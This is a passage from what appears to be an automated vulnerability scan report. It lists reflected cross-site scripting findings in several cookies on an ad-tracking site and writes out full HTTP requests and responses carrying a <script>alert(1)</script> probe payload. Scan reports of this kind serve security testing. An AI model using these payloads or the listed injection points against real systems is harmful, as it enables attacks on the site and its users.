Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov
...[SNIP]...
-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=129211085964715<script>alert(1)</script>0245a6e63af', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec
...[SNIP]...

3.66. http://ar.voicefive.com/b/node_rcAll.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 2f983<script>alert(1)</script>35fb33d1247 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=02f983<script>alert(1)</script>35fb33d1247; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:21 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:21 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23
...[SNIP]...
, "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "BMX_G": '02f983<script>alert(1)</script>35fb33d1247', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00
...[SNIP]...

3.67. http://ar.voicefive.com/b/node_rcAll.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 81f9f<script>alert(1)</script>5831657a1df was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-128892237281f9f<script>alert(1)</script>5831657a1df; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:22 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:22 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov
...[SNIP]...
4:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-128892237281f9f<script>alert(1)</script>5831657a1df', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_708
...[SNIP]...

3.68. http://ar.voicefive.com/b/node_rcAll.pli [ar_70821733 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_70821733 cookie is copied into the HTML document as plain text between tags. The payload ab359<script>alert(1)</script>47a5537d497 was submitted in the ar_70821733 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&ab359<script>alert(1)</script>47a5537d497; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:21 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:21 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov
...[SNIP]...
"BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&ab359<script>alert(1)</script>47a5537d497', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&' });

3.69. http://ar.voicefive.com/b/node_rcAll.pli [ar_p43112268 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p43112268 cookie is copied into the HTML document as plain text between tags. The payload 996bb<script>alert(1)</script>43ad9a6db3b was submitted in the ar_p43112268 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&996bb<script>alert(1)</script>43ad9a6db3b; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:23 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23
...[SNIP]...
u Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&996bb<script>alert(1)</script>43ad9a6db3b' });

3.70. http://ar.voicefive.com/b/node_rcAll.pli [ar_p70821733 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p70821733 cookie is copied into the HTML document as plain text between tags. The payload 447e1<script>alert(1)</script>b180140c94a was submitted in the ar_p70821733 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&447e1<script>alert(1)</script>b180140c94a; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:24 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:24 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&447e1<script>alert(1)</script>b180140c94a', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:4
...[SNIP]...

3.71. http://ar.voicefive.com/b/node_rcAll.pli [ar_p72213098 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p72213098 cookie is copied into the HTML document as plain text between tags. The payload 6376a<script>alert(1)</script>1fac8e76f23 was submitted in the ar_p72213098 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&6376a<script>alert(1)</script>1fac8e76f23; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:23 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&6376a<script>alert(1)</script>1fac8e76f23', "ar_p43112268": 'exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat D
...[SNIP]...

3.72. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76230671 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p76230671 cookie is copied into the HTML document as plain text between tags. The payload a358b<script>alert(1)</script>cd9aa76dedc was submitted in the ar_p76230671 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&a358b<script>alert(1)</script>cd9aa76dedc; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:20 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:20 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&a358b<script>alert(1)</script>cd9aa76dedc', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&', "ar_p72213098": 'exp=2&initExp=Thu Nov 25 14:06:18 2010&recEx
...[SNIP]...

3.73. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76459327 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p76459327 cookie is copied into the HTML document as plain text between tags. The payload b30ca<script>alert(1)</script>7badc2c3ab9 was submitted in the ar_p76459327 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&b30ca<script>alert(1)</script>7badc2c3ab9; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:23 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov
...[SNIP]...
5 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&', "ar_p76459327": 'exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&b30ca<script>alert(1)</script>7badc2c3ab9' });

3.74. http://ar.voicefive.com/b/node_rcAll.pli [ar_p76910469 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p76910469 cookie is copied into the HTML document as plain text between tags. The payload 7d39c<script>alert(1)</script>9d09c880b4a was submitted in the ar_p76910469 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&7d39c<script>alert(1)</script>9d09c880b4a; BMX_3PC=1; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; BMX_G=0; UID=177862ed-204.0.5.41-1288922372; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 Dec 2010 03:23:19 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
